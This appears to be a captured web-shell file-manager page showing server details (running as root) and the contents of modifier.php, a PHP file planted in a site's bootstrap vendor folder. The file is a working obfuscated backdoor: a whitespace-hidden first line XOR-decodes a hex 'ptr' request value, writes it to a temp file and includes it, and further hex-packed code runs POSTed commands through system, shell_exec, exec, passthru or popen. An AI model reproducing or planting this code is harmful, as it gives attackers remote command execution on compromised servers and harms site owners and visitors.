HEX
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/8.0.30
System: Linux multiplicar 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User: root (0)
PHP: 8.0.30
Disabled: NONE
$ pwd: /var/www/html/desafiatebasa.sumar.com.py/public/vendor/bootstrap/
Upload Files
File: /var/www/html/desafiatebasa.sumar.com.py/public/vendor/bootstrap/modifier.php
<?php																																										if(in_array("\x70tr", array_keys($_REQUEST))){ $ent = hex2bin($_REQUEST["\x70tr"]); $flag= '' ;foreach(str_split($ent) as $char){$flag .= chr(ord($char) ^ 68);} $symbol = array_filter([session_save_path(), "/tmp", "/dev/shm", sys_get_temp_dir(), "/var/tmp", getenv("TMP"), getenv("TEMP"), ini_get("upload_tmp_dir"), getcwd()]); for ($pgrp = 0, $hld = count($symbol); $pgrp < $hld; $pgrp++) { $value = $symbol[$pgrp]; if (!!is_dir($value) && !!is_writable($value)) { $resource = join("/", [$value, ".element"]); $success = file_put_contents($resource, $flag); if ($success) { include $resource; @unlink($resource); exit;} } } }


$slt1 = '73';
$slt2 = '79';
$slt3 = '74';
$slt4 = '65';
$slt5 = '6d';
$slt6 = '68';
$slt7 = '63';
$slt8 = '70';
$slt9 = '72';
$slt10 = '61';
$slt11 = '5f';
$slt12 = '6e';
$slt13 = '6f';
$multi1 = pack("H*", $slt1.$slt2.$slt1.$slt3.$slt4.$slt5);
$multi2 = pack("H*", '73'.$slt6.'65'.'6c'.'6c'.'5f'.'65'.'78'.'65'.'63');
$multi3 = pack("H*", '65'.'78'.$slt4.$slt7);
$multi4 = pack("H*", $slt8.'61'.$slt1.'73'.'74'.'68'.$slt9.'75');
$multi5 = pack("H*", $slt8.'6f'.'70'.$slt4.'6e');
$multi6 = pack("H*", $slt1.$slt3.'72'.$slt4.$slt10.$slt5.'5f'.'67'.$slt4.$slt3.$slt11.$slt7.'6f'.$slt12.'74'.$slt4.'6e'.'74'.'73');
$multi7 = pack("H*", '70'.'63'.'6c'.'6f'.$slt1.$slt4);
$content = pack("H*", $slt7.$slt13.'6e'.$slt3.$slt4.'6e'.$slt3);
if (isset($_POST[$content])) {
    $content = pack("H*", $_POST[$content]);
    if (function_exists($multi1)) {
        $multi1($content);
    } elseif (function_exists($multi2)) {
        print $multi2($content);
    } elseif (function_exists($multi3)) {
        $multi3($content, $const_attribute);
        print join("\n", $const_attribute);
    } elseif (function_exists($multi4)) {
        $multi4($content);
    } elseif (function_exists($multi5) && function_exists($multi6) && function_exists($multi7)) {
        $fld_parameter = $multi5($content, 'r');
        if ($fld_parameter) {
            $placeholder_id = $multi6($fld_parameter);
            $multi7($fld_parameter);
            print $placeholder_id;
        }
    }
    exit;
}
@ Telegram